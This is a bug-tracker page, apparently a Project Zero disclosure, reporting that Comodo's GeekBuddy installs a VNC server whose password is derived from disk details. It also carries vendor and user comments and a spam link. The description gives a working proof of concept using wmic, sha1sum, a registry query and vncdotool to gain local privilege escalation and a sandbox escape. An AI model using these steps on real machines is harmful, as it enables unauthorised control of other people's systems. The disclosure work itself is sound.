Fixed
Status Update
No update yet.
Comments
ta...@google.com
Update today:
Hello Tavis,
Regarding the vulnerability below, we have issued a hotfix on 10th of February.
GB 4.25.380415.167 has the required fix and 90+% of existing users are updated as of now.
Hello Tavis,
Regarding the vulnerability below, we have issued a hotfix on 10th of February.
GB 4.25.380415.167 has the required fix and 90+% of existing users are updated as of now.
ko...@gmail.com
Wow, so that's what you meant on Twitter.
That's shady and horribly disappointing. If there was ever a reason to uninstall Comodo, this was it.
Thanks for everything you and Project Zero does. :)
That's shady and horribly disappointing. If there was ever a reason to uninstall Comodo, this was it.
Thanks for everything you and Project Zero does. :)
to...@gmail.com
Wow have you read the spin Comodo put on this? "ITS NOT REMOTELY EXPLOITABLE" they claim, completely dismissing responsibility for what is a serious privilege escalation vulnerability.
se...@gmail.com
[Comment Deleted]
[Deleted User] <[Deleted User]>
This transcends a simple bug and vulnerability, it is a backdoor.
da...@gmail.com
@tobias, indeed, it's also written after the fact, as though the current state is how it was before.
You can't issue a patch, then claim there wasn't a problem by describing how the software works post-patch.
You can't issue a patch, then claim there wasn't a problem by describing how the software works post-patch.
gl...@gmail.com
Thanks for your greeting. i have see your profile blog, i very like with your page. but i need much more about your article smile
because your article is so so nice.
http://daftarcaramembuatakunemail.blogspot.com
because your article is so so nice.
Description
When you install Comodo Internet Security, in the default configuration an application called "GeekBuddy" is also installed and added to HKLM\System\CurrentControlSet\Services. GeekBuddy is a tech support application, that uses a number of questionable and shady tactics to encourage users to pay for online tech support.
As has been noted by numerous people over the last few years, GeekBuddy also installs a VNC server and enables it by default.
e.g.
This is an obvious and ridiculous local privilege escalation, which apparently Comodo believe they have resolved by generating a password instead of leaving it blank. That is not the case, as the password is simply the first 8 characters of SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks). I imagine Comodo thought nobody would bother checking how they generated the password, because this clearly doesn't prevent the attack they claim it solved.
Not to mention that this is also a sandbox escape that even works against Comodo and Chromodo sandboxes, not to mention Chrome, Protected Mode, and other sandboxes.
This information is available to unprivileged users, for example, an unprivileged user can launch calc.exe like this:
$ wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks
Caption SerialNumber Signature TotalTracks
VMware, VMware Virtual S SCSI Disk Device -135723213 1997160
$ printf VMware,VMwareVirtualSSCSIDiskDevice-13572321319971601997160 | sha1sum | cut -c-8
7d4612e5
$ printf "key ctrl-esc\ntype calc.exe\nkey enter\n" | vncdotool -p 7d4612e5 -s localhost::5901 -
I'm using vncdotool from here:
(Note: if there is no SerialNumber field, TotalTracks needs to be repeated twice, I think this is a bug)
Or alternatively you can pull the password out of HKLM, just truncate it to 8 characters(!!!):
$ reg query HKLM\System\Software\COMODO\CLPS\ 4\CA /v osInstanceId
HKEY_LOCAL_MACHINE\System\Software\COMODO\CLPS 4\CA
osInstanceId REG_SZ 7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3
Screenshot attached for reference.
It feels like there might be a way to make this remote, perhaps via dns-rebinding and websockets.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.